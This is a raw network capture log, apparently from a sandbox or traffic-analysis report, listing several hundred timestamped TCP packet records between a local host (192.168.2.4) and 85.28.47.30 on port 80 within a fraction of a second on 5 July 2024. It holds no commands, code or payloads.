                                                                Jul 5, 2024 04:23:16.550375938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550388098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550389051 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550398111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550405979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550410032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550421953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550431013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550434113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550446033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550456047 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550466061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550470114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550470114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550484896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550494909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550497055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550509930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550519943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550519943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550530910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550532103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550544024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550553083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550561905 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550565958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550576925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550580978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550606012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550612926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550633907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550643921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550652981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550662994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550678015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550685883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550687075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550698996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550709009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550714016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550719976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550729036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550731897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550743103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550744057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550755024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550765991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550776958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550786018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550796986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550802946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550806999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550817966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550822020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550831079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550833941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550858021 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550883055 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.551048994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551064014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551074982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551085949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551090002 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.551098108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551109076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551116943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.551121950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551135063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551141024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.551155090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551157951 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.551167011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551170111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.551178932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551191092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551203012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.551203966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551212072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.551218033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.551242113 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.551254034 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.644594908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644606113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644612074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644655943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.644663095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644675016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644686937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644697905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644722939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.644751072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.644834995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644845963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644855976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644869089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644879103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.644886017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644891977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.644897938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644908905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644917965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.644921064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644932985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644942045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644944906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.644975901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.644978046 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.644989967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645004034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645009995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645019054 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645051003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645075083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645123005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645134926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645143986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645154953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645165920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645176888 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645180941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645191908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645199060 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645203114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645215034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645217896 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645226002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645236015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645241022 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645246983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645258904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645262957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645271063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645272017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645284891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645298004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645317078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645335913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645486116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645495892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645503044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645513058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645524025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645538092 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645567894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645601988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645615101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645625114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645633936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645644903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645646095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645658016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645659924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645668983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645682096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645693064 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645694017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645726919 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645726919 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645740986 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645912886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645922899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645932913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645944118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645948887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645967960 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645975113 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.645982981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.645993948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.646003962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.646013975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.646023035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.646033049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.646034956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.646044970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.646054983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.646058083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.646069050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.646070957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.646081924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.646084070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.646102905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.646106005 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.646132946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.646157980 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.680459976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.685187101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.868885040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.868896961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.868915081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.868927002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.868954897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.868954897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869012117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869030952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869045973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869066000 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869077921 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869085073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869087934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869101048 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869134903 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869151115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869225025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869230032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869256973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869266987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869301081 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869319916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869388103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869523048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869590044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869616985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869633913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.869641066 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869702101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.869743109 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870322943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870342970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870353937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870364904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870377064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870378017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870388031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870403051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870414972 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870419025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870444059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870452881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870471954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870488882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870523930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870548964 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870667934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870771885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870781898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870788097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870815992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870817900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870845079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870861053 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870893955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870934010 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.870945930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.870987892 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871033907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871066093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871073008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871110916 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871134996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871176958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871252060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871298075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871304989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871337891 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871741056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871752977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871763945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871777058 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871790886 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871803045 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871825933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871835947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871872902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871907949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871922970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871946096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.871952057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871970892 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.871984005 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872054100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872064114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872095108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872138977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872176886 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872185946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872220039 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872246027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872284889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872406960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872447014 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872490883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872529984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872555017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872575045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872600079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872612953 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872677088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872715950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872756004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872766972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872798920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.872972965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872983932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.872994900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873012066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873028994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873131037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873142004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873152971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873164892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873178005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873178959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873188972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873195887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873207092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873219013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873230934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873239040 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873241901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873271942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873282909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873287916 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873287916 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873295069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873306990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873310089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873316050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873320103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873332024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873336077 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873344898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873358965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873362064 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873369932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873382092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873388052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873400927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873413086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873425007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873430014 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873437881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873456001 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873529911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873542070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873550892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873563051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873574972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873579025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873586893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873590946 CEST4973280192.168.2.485.28.47.30
